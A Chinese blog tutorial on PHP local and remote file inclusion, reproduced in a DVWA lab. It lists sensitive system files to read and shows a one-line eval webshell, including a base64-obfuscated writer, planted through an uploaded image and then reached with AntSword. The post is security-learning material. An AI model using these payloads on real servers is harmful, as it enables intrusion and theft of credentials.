文件包含漏洞

最新推荐文章于 2022-12-13 16:04:49 发布
最新推荐文章于 2022-12-13 16:04:49 发布
阅读量117 收藏
点赞数
分类专栏: 漏洞复现 文章标签: mysql php 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41048303/article/details/121091264
版权

文件包含漏洞

  • 原理解析
#PHP包含(PHP中提供了四个文件包含的函数)
require 找不到被包含的文件时会产生致命错误(E_COMPILE_ERROR),并停止脚本
include 找不到被包含的文件时只会产生警告(E_WARNING),脚本将继续执行
include_once 此语句和include()语句类似,如果该文件中的代码已经被包含,则不会再次包含。
require_once 此语句和require()语句类似,如果该文件中的代码已经被包含,则不会再次包含。

  • 本地文件包含

    #index1.php
<?php
	include("phpinfo.txt");
?>

    # phpinfo.txt
<?php
	phpinfo();
?>

    在这里插入图片描述

    #config.txt
$DBMS = 'MySQL';
$_DVWA = array();
$_DVWA[ 'db_server' ]   = '127.0.0.1';
$_DVWA[ 'db_database' ] = 'dvwa';
$_DVWA[ 'db_user' ]     = 'root';
$_DVWA[ 'db_password' ] = 'root';
$_DVWA[ 'db_port'] = '3306';

在这里插入图片描述

由此可知,包含非PHP语法规范源文件时,将会暴露其源文件

  • 远程文件包含
    PHP不仅可以对本地文件进行包含,还可以对远程文件进行包含。如果要使用远程包含功能,需要在php.ini配置文件中修改allow_url_include = On //开启远程文件包含
#index2.php
<?php
	include($_GET['page']);
?>

# http://192.168.254.182/test.txt
<?php
        echo "远程文件包含漏洞";
?>

在这里插入图片描述

  • 常见的攻击方式
#读取敏感文件
1)Windows系统
C:\boot.ini                                 //查看系统版本
C:\windows\system32\inetsrv\MetaBase.xml    //IIS配置文件
C:\windows\repair\sam                       //存储Windows系统初次安装的密码
C:\Program Files\mysql\my.ini               //Mysql配置
C:\Program Files\mysql\data\mysql\user.MYD  //Msql root
C:\windows\php.ini                          //php配置信息

2)UNIX/Linux
/etc/passwd
/usr/local/app/apache2/conf/httpd.conf      //apache2默认配置文件
/usr/local/app/apache2/conf/extra/httpd-vhosts.conf   //虚拟网站设置
/usr/local/app/php5/lib/php.ini             //php相关配置
/etc/httpd/conf/httpd.conf                  //apache配置文件
/etc/my.conf                                //Mysql的配置文件

在这里插入图片描述

  • 本地包含配合文件上传

    #将一句话木马上穿到服务器
# http://192.168.254.183/upload-labs/upload/test.jpg
<?php 
fputs(fopen("shell.php","w"),"<?php eval($_POST[wcs]);?>")
?>

    在这里插入图片描述
    访问URL:http://192.168.254.183/dvwa/vulnerabilities/fi/?page=…/…/…/upload-labs/upload/test.jpg
    在这里插入图片描述

这个实现的要求还是比较大的,首先php.ini 中allow_url_fopen选项是激活的,然后还要知道上传文件在服务器的路径,最后所访问路径允许fputs生成文件。并且使用上面未编码的方式写入一句话木马存在过滤的情况,所以可以使用下面编码的方式进行过滤,如果不进行编码,文件包含生成的一句话木马会为空。

#原一句话木马
<?php @eval($_POST['wcs']);?>
#Base64编码后
<?php @fputs(fopen(base64_decode('bG9zdC5waHA='),w),base64_decode('PD9waHAgZXZhbCgkX1BPU1Rbd2NzXSk7Pz4='));?>

  • 使用蚁剑进行连接

    在这里插入图片描述

  • 编辑连接信息,将路径和密码填入
    在这里插入图片描述

  • 成功进入后台

在这里插入图片描述

小白头发少
关注
专栏目录
文件漏洞题目搜集
Devil_B的博客
05-14 681
百度杯”CTF比赛 2017 二月场 没错!就是文件包含漏洞。 <?php show_source(__FILE__); if(isset($_REQUEST['path'])){ include($_REQUEST['path']); }else{ include('phpinfo.php'); } 题目内容: 没错!就是文件包含漏洞。 解题知识点: 文件包含:服务器执行PHP文件时,可以通过文件包含函数加载另一个文件中的PHP代码,并且当PHP来执行,这会为开发者节省大量的时
文件包含漏洞简单总结【附练习记录】
ximo的博客
02-13 348
文件包含漏洞 什么是文件包含: 为了更好的使用代码的 重用性,引入了文件包含函数,可以通过文件包含函数将文件包含进来,直接使用包含文件的代码。 文件包含漏洞的成因: 为了灵活的包含文件,将被包含文件设置为变量,通过动态变量引入需要包含的文件时,用户对变量的可控而服务器端卫队变量值合理的校验或被绕过。 文件包含函数: include() // 找不到被包含文件时产生警告,脚本继续执行 include_once() // 与include类似,但如果该文件的代码已经被包含,则不会再次包含 require()
文件包含漏洞示例
热门推荐
神棍之路
08-25 7万+
<?php if( !ini_get('display_errors') ) { ini_set('display_errors', 'On'); } error_reporting(E_ALL); $f = $_GET["file"]; if ($f){ require "".$f.".php"; }else{ print("No File Included"); } ?>
文件包含漏洞练习
weixin_33738578的博客
01-11 180
转载来自:新手指南:DVWA-1.9全级别教程之File Inclusionhttp://www.freebuf.com/articles/web/119150.html (1)File Inclusion,意思是文件包含漏洞),是指当服务器开启allow_url_include选项时,就可以通过php的某些特性函数(include(),require()和include_once(),requ...
文件包含漏洞三道题
qz362228的博客
05-04 1659
1.绕过require_once限制 题目页面: 有两个require_once,则this_is_flag.php已经被包含一次就不会再包含了。而题目意思就是说flag在this_is_flag.php文件中。所以要想绕过前面那个require_once,而执行后面那个。在浏览器中搜索绕过require_once限制 因为知道文件路径,所以最后是/www/html/file_include/Assess01/this_is_flag.php ?url=/proc/self/root/proc/self/r
通达OA v11.8 getway.php 远程文件包含漏洞.md
最新发布
09-07
通达OA漏洞合集
Web应用安全:文件包含漏洞简介.pptx
06-18
文件包含漏洞是Web应用安全领域中的一个重要话题,它主要源于开发者在编程时为了代码复用而采用的文件包含机制。这种机制允许程序动态地加载和执行存储在不同文件中的代码,但同时也为攻击者提供了可乘之机。下面将...
Apache Tomcat 文件包含漏洞(CNVD-2020-10487,对应 CVE-2020-1938)
03-05
CNVD-2020-10487 和 CVE-2020-1938 是同一个安全漏洞的不同命名,这个漏洞被称为“Apache Tomcat 文件包含漏洞”。此漏洞的存在使得攻击者有可能通过精心构造的请求,将恶意代码注入到Tomcat服务器上,从而执行任意...
第七式 七伤拳 web安全之文件包含漏洞专题.pdf
06-22
tsrc线上培训资料 第七式 七伤拳 web安全之文件包含漏洞专题
文件包含漏洞_文件包含漏洞和部分的CTF题
weixin_39516865的博客
12-18 497
文件包含漏洞web6 在bp里面添加:X-Forwarded-For:127.0.0.1web11md5碰撞 上脚本: import hashlib def get_token(txt): m1 = hashlib.md5() m1.update(txt.encode("utf-8")) token = m1.hexdigest() return toke...
文件包含漏洞原理与实践练习题
weixin_54217081的博客
12-13 901
一.多选 1.下列属于文件包含函数的是( ABCD ) A.include B.include_once C.require D.require_once 二.判断 1.文件包含漏洞PHP中比较多,其他语言中不存在。( × ) 2.文件包含漏洞在利用时无视后缀名,任何扩展名都可以被PHP解析。( √ )
文件包含漏洞(随笔)
weixin_30341745的博客
04-21 81
一. 简单理解 文件包含就是一个文件里面包含另外一个文件。一开始接触的时候是因为php里面,但是查找了一些资料这个存在在很多语言里面。 程序开发人员一般会把重复使用的函数写到单个文件中,需要使用某个函数时直接调用此文件,而无需再次编写,这中文件调用的过程一般被称为文件包含。 程序开发人员一般希望代码更灵活,所以将被包含的文件设置为变量,用来进行动态调用, 但正是由于这种灵活性,从而导致客户端可以调...
文件包含漏洞——实例
weixin_54055099的博客
09-24 3107
文件包含漏洞的实例
文件包含漏洞的学习(含pikachu练习)
qq_51558360的博客
01-24 469
文件包含漏洞概述 和SQL注入等攻击方式一样,文件包含漏洞也是一种“注入型漏洞”,其本质就是输入一段用户能够控制的脚本或者代码,并让服务器端执行。 对于包含 以PHP为例,我们常常把可重复使用的函数写入到单个文件中,在使用该函数时,直接调用此文件,而无需再次编写函数,这一过程就叫做包含 漏洞成因 程序开发人员都希望代码更加灵活,所以通常会将被包含的文件设置为变量,用来进行动态调用,但正是由于这种灵活性,从而导致客户端可以调用一个恶意文件,造成文件包含漏洞。 以php,webapplication 中居多。j
DVWA文件包含漏洞练习笔记
m0_63711447的博客
04-28 1642
LOW 1、设置难度等级为low后打开测试环境,依次点击上面的三个php文件,发现url只有参数发生了变化,这个参数便可以进行利用 2、改变参数为一个不存在的文件,出现报错信息,并且爆出了文件的绝对路径 3、读取php.ini文件 (1)用绝对路径构造URL: (2)用相对路径构造URL:读取php.ini文件需要跳转到上两级目录,我们利用../进行上一级目录的跳转 4、远程文件包含:dvwa根目录下有一个phpinfo.php文件,可以显示服务端php配置信息,我们利用相.
安全服务面试总结 (第九弹 文件包含漏洞
qq_42488061的博客
09-25 373
简单一句话,为了更好地使用代码的重用性,引入了文件包含函数,可以通过文件包含函数将文件包含进来,直接使用包含文件的代码。 漏洞成因 在包含文件时候,为了灵活包含文件,将被包含文件设置为变量,通过动态变量来引入需要包含的文件时,用户可以对变量的值可控而服务器端未对变量值进行合理地校验或者校验被绕过,这样就导致了文件包含漏洞。通常文件包含漏洞出现在PHP语言中。 PHP产生文件包含的函数 include( ):当使用该函数包含文件时,只有代码执行到 include()函数时才将文件包含 进来,发生错误时之给
PHP文件包含漏洞深度解析
文件包含漏洞的原理及特点:当应用程序允许用户控制包含文件的路径时,就可能出现文件包含漏洞。攻击者可以通过构造特定的输入,使得程序包含攻击者指定的文件,这可能是服务器上的任意文件,甚至远程服务器上的文件...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值